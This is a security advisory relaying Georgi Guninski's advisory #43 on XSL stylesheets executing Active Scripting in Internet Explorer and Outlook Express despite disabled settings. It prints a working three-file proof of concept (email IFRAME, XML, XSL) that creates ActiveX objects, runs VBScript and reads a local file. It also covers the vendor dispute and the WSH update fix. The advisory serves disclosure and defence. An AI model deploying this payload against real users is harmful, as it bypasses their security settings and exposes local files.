COMMAND

    IE

SYSTEMS AFFECTED

    XML scripting in IE, Outlook Express

PROBLEM

    Following is  based on  a Georgi  Guninski security  advisory #43.
    We have  some disagreement  with Microsoft  whether this  works on
    fully patched IE 5.x.  We believe we are running fully patched  IE
    according  to  the  rules  for  patching  in  Microsoft's security
    bulletins.  The problem  seems to be the  version of WSH which  is
    described in MS-01-015 at:

        http://www.microsoft.com/technet/security/bulletin/ms01-015.asp

    To check  whether you  are vulnerable  check DEMONSTRATION.   Note
    that this patch was updated later so that could be the trick.

    It is possible  to execute Active  Scripting with the  help of XML
    and  XSL  even  if  Active  Scripting  is disabled in all security
    zones.  This  is especially dangerous  in email messages.   Though
    this  is  not  typical  exploit  itself,  it  may be used in other
    exploits especially in email.

    The problem are xml stylesheets which may contain Active Scripting
    and  they  are  executed  regardless  of  the  settings for Active
    Scripting in IE/Outlook Express.   Below is a demonstration  which
    executes Active  Scripting which  contains the  demo from advisory
    #41.  When xstyle.eml  is viewed with IE  or OE the Active  Script
    in it is executed regardless of user's settings.

        --xstyle.eml--------------------------------------------------------------
        ....
        <IFRAME SRC="http://SOMEHOST/xstyle.xml"></IFRAME>
        ....
        --------------------------------------------------------------------------

        --xstyle.xml--------------------------------------------------------------
        <?xml version="1.0"?>
        <?xml-stylesheet type="text/xsl" href="xstyle.xsl" ?>
        <doc>
        style
        </doc>
        --------------------------------------------------------------------------

        --xstyle.xsl--------------------------------------------------------------
        <xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
        <xsl:script>
        <![CDATA[
        a=new ActiveXObject('htmlfile');
        a.open();
        a.write("<html><body>gg</body></html>");
        a.close();
        v=new ActiveXObject("MSScriptControl.ScriptControl.1");
        v.Language="VBScript";
        v.eval('MsgBox ("This is VBSCRIPT",65,"This is VBSCRIPT")');
        x=v.eval('GetObject("C:/test.txt","htmlfile")');
        v.eval('MsgBox ("Hi",65,"Hi")');
        a.location="about:Here is your file <BR>"+x.body.innerHTML;
        ]]>
        </xsl:script>
        </xsl:stylesheet>

    Demonstration:

        http://www.guninski.com/xstyle.eml

    disable Active Scripting  and if you  see any message  box you are
    vulnerable.

SOLUTION

    Microsoft cannot reproduce  the problem on  fully patched IE  5.x,
    Outlook Express (probably Outlook have not tested).

    Microsoft  claims  updating  WSH  solves  the issue.  Updating WSH
    DOES resolve this  issue.  Patching/upgrading  the browser had  no
    effect.